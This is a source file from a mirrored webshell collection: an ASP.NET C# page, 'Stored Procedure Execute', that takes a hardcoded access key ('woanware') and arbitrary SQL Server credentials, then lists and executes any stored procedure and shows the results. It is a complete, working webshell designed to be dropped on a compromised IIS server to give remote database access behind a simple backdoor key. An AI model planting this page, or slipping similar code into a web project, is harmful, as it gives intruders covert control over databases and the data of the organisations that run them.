mirror of
https://github.com/tennc/webshell
synced 2024-11-25 12:40:17 +00:00
367 lines
14 KiB
Text
367 lines
14 KiB
Text
<%@ Page Language="C#" %>
|
|
<%@ Import namespace="System.Data"%>
|
|
<%@ Import namespace="System.Data.SqlClient"%>
|
|
|
|
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|
|
|
|
<script runat="server" language="c#">
|
|
private const string AUTHKEY = "woanware";
|
|
|
|
/// <summary>
|
|
///
|
|
/// </summary>
|
|
/// <param name="sender"></param>
|
|
/// <param name="e"></param>
|
|
protected void btnLogin_Click(object sender, EventArgs e)
|
|
{
|
|
SqlConnection sqlConnection = null;
|
|
|
|
try
|
|
{
|
|
if (txtAuthKey.Text != AUTHKEY)
|
|
{
|
|
return;
|
|
}
|
|
|
|
sqlConnection = new SqlConnection();
|
|
|
|
sqlConnection.ConnectionString = "Data source=" + txtDatabaseServer.Text +
|
|
";User id=" + txtUserId.Text +
|
|
";Password=" + txtPassword.Text +
|
|
";Initial catalog=" + txtDatabase.Text;
|
|
sqlConnection.Open();
|
|
|
|
SqlCommand sqlCommand = null;
|
|
SqlDataAdapter sqlDataAdapter = null;
|
|
|
|
sqlCommand = new SqlCommand("sp_stored_procedures", sqlConnection);
|
|
sqlCommand.CommandType = CommandType.StoredProcedure;
|
|
|
|
sqlDataAdapter = new SqlDataAdapter(sqlCommand);
|
|
|
|
lblStatus.Text = string.Empty;
|
|
|
|
DataSet dataSet = new DataSet();
|
|
|
|
sqlDataAdapter.Fill(dataSet, "SPs");
|
|
|
|
cboSps.DataSource = dataSet.Tables["SPs"];
|
|
cboSps.DataTextField = "PROCEDURE_NAME";
|
|
cboSps.DataBind();
|
|
}
|
|
catch (SqlException sqlEx)
|
|
{
|
|
lblStatus.Text = sqlEx.Message;
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
lblStatus.Text = ex.Message;
|
|
}
|
|
finally
|
|
{
|
|
if (sqlConnection != null)
|
|
{
|
|
sqlConnection.Dispose();
|
|
}
|
|
}
|
|
}
|
|
|
|
/// <summary>
|
|
///
|
|
/// </summary>
|
|
/// <param name="sender"></param>
|
|
/// <param name="e"></param>
|
|
protected void btnGetParameters_Click(object sender, EventArgs e)
|
|
{
|
|
SqlConnection sqlConnection = null;
|
|
|
|
try
|
|
{
|
|
if (txtAuthKey.Text != AUTHKEY)
|
|
{
|
|
return;
|
|
}
|
|
|
|
sqlConnection = new SqlConnection();
|
|
|
|
sqlConnection.ConnectionString = "Data source=" + txtDatabaseServer.Text +
|
|
";User id=" + txtUserId.Text +
|
|
";Password=" + txtPassword.Text +
|
|
";Initial catalog=" + txtDatabase.Text;
|
|
|
|
SqlCommand sqlCommand = new SqlCommand("sp_sproc_columns", sqlConnection);
|
|
sqlCommand.CommandType = CommandType.StoredProcedure;
|
|
|
|
SqlDataAdapter sqlDataAdapter = new SqlDataAdapter(sqlCommand);
|
|
|
|
lblStatus.Text = string.Empty;
|
|
sqlCommand.CommandType = CommandType.StoredProcedure;
|
|
sqlCommand.Parameters.Add("@procedure_name", SqlDbType.NVarChar, 390).Value = cboSps.SelectedItem.Value;
|
|
|
|
DataSet dataSet = new DataSet();
|
|
|
|
sqlDataAdapter.Fill(dataSet, "Parameters");
|
|
|
|
gridParameters.DataSource = dataSet.Tables["Parameters"];
|
|
gridParameters.DataBind();
|
|
|
|
gridResults.Visible = false;
|
|
}
|
|
catch (SqlException sqlEx)
|
|
{
|
|
lblStatus.Text = sqlEx.Message;
|
|
}
|
|
finally
|
|
{
|
|
if (sqlConnection != null)
|
|
{
|
|
sqlConnection.Dispose();
|
|
}
|
|
}
|
|
}
|
|
|
|
/// <summary>
|
|
///
|
|
/// </summary>
|
|
/// <param name="sender"></param>
|
|
/// <param name="e"></param>
|
|
protected void btnExecute_Click(object sender, EventArgs e)
|
|
{
|
|
SqlConnection sqlConnection = null;
|
|
|
|
try
|
|
{
|
|
if (txtAuthKey.Text != AUTHKEY)
|
|
{
|
|
return;
|
|
}
|
|
|
|
sqlConnection = new SqlConnection();
|
|
|
|
sqlConnection.ConnectionString = "Data source=" + txtDatabaseServer.Text +
|
|
";User id=" + txtUserId.Text +
|
|
";Password=" + txtPassword.Text +
|
|
";Initial catalog=" + txtDatabase.Text;
|
|
|
|
DataSet dataSet = new DataSet();
|
|
|
|
SqlCommand sqlCommand = new SqlCommand(cboSps.SelectedItem.Value, sqlConnection);
|
|
|
|
SqlDataAdapter sqlDataAdapter = new SqlDataAdapter(sqlCommand);
|
|
|
|
lblStatus.Text = string.Empty;
|
|
|
|
sqlCommand.CommandType = CommandType.StoredProcedure;
|
|
|
|
this.AddParameters(sqlCommand);
|
|
|
|
sqlDataAdapter.Fill(dataSet, "Results");
|
|
|
|
this.UpdateParameters(sqlCommand);
|
|
|
|
gridResults.DataSource = dataSet.Tables["Results"];
|
|
gridResults.DataBind();
|
|
gridResults.Visible = true;
|
|
}
|
|
catch (SqlException sqlEx)
|
|
{
|
|
lblStatus.Text = sqlEx.Message;
|
|
}
|
|
finally
|
|
{
|
|
if (sqlConnection != null)
|
|
{
|
|
sqlConnection.Dispose();
|
|
}
|
|
}
|
|
}
|
|
|
|
/// <summary>
|
|
///
|
|
/// </summary>
|
|
/// <param name="sqlCommand"></param>
|
|
private void AddParameters(SqlCommand sqlCommand)
|
|
{
|
|
foreach (DataGridItem dataGridItem in gridParameters.Items)
|
|
{
|
|
if (((TableCell)dataGridItem.Controls[5]).Text != "5")
|
|
{
|
|
switch (((TableCell)dataGridItem.Controls[1]).Text.ToLower())
|
|
{
|
|
case "bit":
|
|
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.Bit).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
|
|
break;
|
|
case "bigint":
|
|
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.BigInt).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
|
|
break;
|
|
case "char":
|
|
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.Char, int.Parse(((TableCell)dataGridItem.Controls[2]).Text)).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
|
|
break;
|
|
case "datetime":
|
|
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.DateTime).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
|
|
break;
|
|
case "decimal":
|
|
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.Decimal).Value = decimal.Parse(((TextBox)dataGridItem.Controls[6].Controls[1]).Text);
|
|
break;
|
|
case "float":
|
|
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.Float).Value = float.Parse(((TextBox)dataGridItem.Controls[6].Controls[1]).Text);
|
|
break;
|
|
case "int":
|
|
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.Int).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
|
|
break;
|
|
case "nchar":
|
|
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.NChar).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
|
|
break;
|
|
case "ntext":
|
|
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.NText, int.Parse(((TableCell)dataGridItem.Controls[2]).Text)).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
|
|
break;
|
|
case "nvarchar":
|
|
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.NVarChar, int.Parse(((TableCell)dataGridItem.Controls[2]).Text)).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
|
|
break;
|
|
case "real":
|
|
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.Real).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
|
|
break;
|
|
case "smallint":
|
|
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.SmallInt).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
|
|
break;
|
|
case "tinyint":
|
|
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.TinyInt).Value = uint.Parse(((TextBox)dataGridItem.Controls[6].Controls[1]).Text);
|
|
break;
|
|
case "varchar":
|
|
sqlCommand.Parameters.Add(((TableCell)dataGridItem.Controls[0]).Text, SqlDbType.VarChar, int.Parse(((TableCell)dataGridItem.Controls[2]).Text)).Value = ((TextBox)dataGridItem.Controls[6].Controls[1]).Text;
|
|
break;
|
|
default:
|
|
continue;
|
|
}
|
|
}
|
|
|
|
if (((TableCell)dataGridItem.Controls[5]).Text == "2")
|
|
{
|
|
sqlCommand.Parameters[((TableCell)dataGridItem.Controls[0]).Text].Direction = ParameterDirection.InputOutput;
|
|
}
|
|
}
|
|
}
|
|
|
|
/// <summary>
|
|
///
|
|
/// </summary>
|
|
/// <param name="sqlCommand"></param>
|
|
private void UpdateParameters(SqlCommand sqlCommand)
|
|
{
|
|
foreach (DataGridItem dataGridItem in gridParameters.Items)
|
|
{
|
|
if (((TableCell)dataGridItem.Controls[5]).Text != "5")
|
|
{
|
|
((TableCell)dataGridItem.Controls[7]).Text = sqlCommand.Parameters[((TableCell)dataGridItem.Controls[0]).Text].Value.ToString();
|
|
}
|
|
}
|
|
}
|
|
</script>
|
|
|
|
<html xmlns="http://www.w3.org/1999/xhtml" >
|
|
<head runat="server">
|
|
<title>Stored Procedure Execute</title>
|
|
<style type="text/css"><!--body,table,p,pre,form input,form select {font-family: "Lucida Console", monospace; font-size: 88%;}--></style>
|
|
</head>
|
|
<body>
|
|
<form id="form1" runat="server">
|
|
<table>
|
|
<tbody>
|
|
<tr>
|
|
<td>
|
|
Key:</td>
|
|
<td>
|
|
<asp:TextBox id="txtAuthKey" runat="server"></asp:TextBox>
|
|
</td>
|
|
</tr>
|
|
<tr>
|
|
<td>
|
|
Database server:</td>
|
|
<td>
|
|
<asp:TextBox id="txtDatabaseServer" runat="server"></asp:TextBox>
|
|
</td>
|
|
</tr>
|
|
<tr>
|
|
<td>
|
|
User id:</td>
|
|
<td>
|
|
<asp:TextBox id="txtUserId" runat="server"></asp:TextBox>
|
|
</td>
|
|
</tr>
|
|
<tr>
|
|
<td>
|
|
Password:</td>
|
|
<td>
|
|
<asp:TextBox id="txtPassword" runat="server"></asp:TextBox>
|
|
</td>
|
|
</tr>
|
|
<tr>
|
|
<td>
|
|
Database:</td>
|
|
<td>
|
|
<asp:TextBox id="txtDatabase" runat="server"></asp:TextBox>
|
|
</td>
|
|
</tr>
|
|
<tr>
|
|
<td>
|
|
</td>
|
|
<td>
|
|
<asp:Button id="btnLogin" onclick="btnLogin_Click" runat="server" Text="Login"></asp:Button>
|
|
</td>
|
|
</tr>
|
|
<tr>
|
|
<td>
|
|
Stored procedures:</td>
|
|
<td>
|
|
<asp:DropDownList id="cboSps" runat="server"></asp:DropDownList>
|
|
</td>
|
|
</tr>
|
|
<tr>
|
|
<td>
|
|
</td>
|
|
<td>
|
|
<p>
|
|
<asp:Button id="btnGetParams" onclick="btnGetParameters_Click" runat="server" Text="Get Parameters"></asp:Button>
|
|
<asp:Button id="btnExecute" onclick="btnExecute_Click" runat="server" Text="Execute Query"></asp:Button>
|
|
</p>
|
|
</td>
|
|
</tr>
|
|
<tr>
|
|
<td>
|
|
Status:</td>
|
|
<td>
|
|
<asp:Label id="lblStatus" runat="server"></asp:Label></td>
|
|
</tr>
|
|
</tbody>
|
|
</table>
|
|
<p>
|
|
<asp:DataGrid id="gridParameters" runat="server" AutoGenerateColumns="False">
|
|
<Columns>
|
|
<asp:BoundColumn DataField="column_name" HeaderText="Name"></asp:BoundColumn>
|
|
<asp:BoundColumn DataField="type_name" HeaderText="Type"></asp:BoundColumn>
|
|
<asp:BoundColumn DataField="length" HeaderText="Length"></asp:BoundColumn>
|
|
<asp:BoundColumn DataField="precision" HeaderText="Precision"></asp:BoundColumn>
|
|
<asp:BoundColumn DataField="scale" HeaderText="Scale"></asp:BoundColumn>
|
|
<asp:BoundColumn DataField="column_type" HeaderText="Column Type"></asp:BoundColumn>
|
|
<asp:TemplateColumn HeaderText="Input Value">
|
|
<ItemTemplate>
|
|
<asp:TextBox ID="TextBox1" runat="server"></asp:TextBox>
|
|
</ItemTemplate>
|
|
</asp:TemplateColumn>
|
|
<asp:BoundColumn HeaderText="Output Value"></asp:BoundColumn>
|
|
</Columns>
|
|
</asp:DataGrid>
|
|
</p>
|
|
<p>
|
|
<asp:DataGrid id="gridResults" runat="server"></asp:DataGrid>
|
|
</p>
|
|
<p>
|
|
</p>
|
|
<p>
|
|
<a href="spexec.aspx">Restart</a>
|
|
</p>
|
|
</form>
|
|
</body>
|
|
</html>
|
|
|
|
<!-- Created by Mark Woan (http://www.woanware.co.uk) -->
|